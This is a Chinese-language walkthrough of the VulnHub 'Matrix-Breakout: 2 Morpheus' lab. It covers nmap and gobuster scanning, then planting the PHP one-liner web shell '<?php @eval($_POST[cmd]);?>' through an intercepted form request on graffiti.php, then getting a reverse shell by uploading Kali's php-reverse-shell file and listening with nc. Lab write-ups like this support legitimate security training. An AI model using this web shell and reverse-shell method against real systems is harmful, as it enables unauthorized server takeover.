【此練習僅做到反彈shell】
1.靶機下載地址
https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
2. 打開靶機,kali使用nmap掃描同C段的主機? 找到靶機ip
確保靶機和kali網卡均為NAT模式
先查看kali的ip
nmap 192.168.182.1/24? ? ? ?排除物理機、網關、kali等,可得出靶機ip為? 192.168.182.162、
以及開啟端口:22 ssh、80 http 、81? hosts2-ns
3.? 直接通過ip訪問頁面? ?發現無法ssh,以及關鍵詞Trinity
4.? kali的dirb掃描敏感目錄
發現 /robots.txt文件、
以及js腳本文件:?/javascript/jquery? ? ? ? 、? /javascript/jquery/jquery
5. 訪問多個目錄的網址
ip/robots.txt? 無任何信息
?/javascript/jquery? 無權限訪問
/javascript/jquery/jquery? ? ? 頁面源代碼
無有效結果,換其他方式掃描目錄
6.? 使用gobuster再次掃描
輸入:gobuster dir -u http://192.168.182.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
注意:
發現無gobuster ,kali使用apt命令進行安裝:apt install gobuster。
如果無法找到軟件包,請先更新apt命令:apt update。
再安裝gobuster即可。
安裝完成,再次執行開始的那條命令。
掃描結果,發現 /robots.txt? ?、 /graffiti.txt? ?、? ?/graffiti.php? 三個可用 文件
7.對 /graffiti.txt? ?、? ?/graffiti.php 進行訪問
在 graffiti.php 頁面發現輸入框
8.在輸入框輸入123456,點擊Post,發現頁面顯示出該內容
9. 嘗試輸入一句話木馬
輸入:<?php @eval($_POST[cmd]);?>
抓包,發現將數據提交到?graffiti.txt文件中
將message值改為一句話木馬,目標文件改為shell.php文件。發行,關閉攔截。
10. 訪問shell.php文件,蟻劍進行連接
11. 找到kali自帶的反彈shell文件,復制內容到物理機保存為1.php
kali:
cd /usr/share/webshells/
cd php
cat php-reverse-shell.php
12. 修改ip和端口
13. 將 1.php文件通過蟻劍上傳到靶機中
14.kali的nc監聽6654端口,瀏覽器訪問上傳的1.php,反彈shell
監聽返回了shell,輸入whoami驗證,成功。
此練習僅做到反彈shell。
練習結束,反彈shell可通過kali的自帶反彈shell文件,上傳文件并訪問獲取shell。
對大家能有些許幫助最好,沒有的話請見諒。
再見。。。
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?----------------2025/3/19? 21:52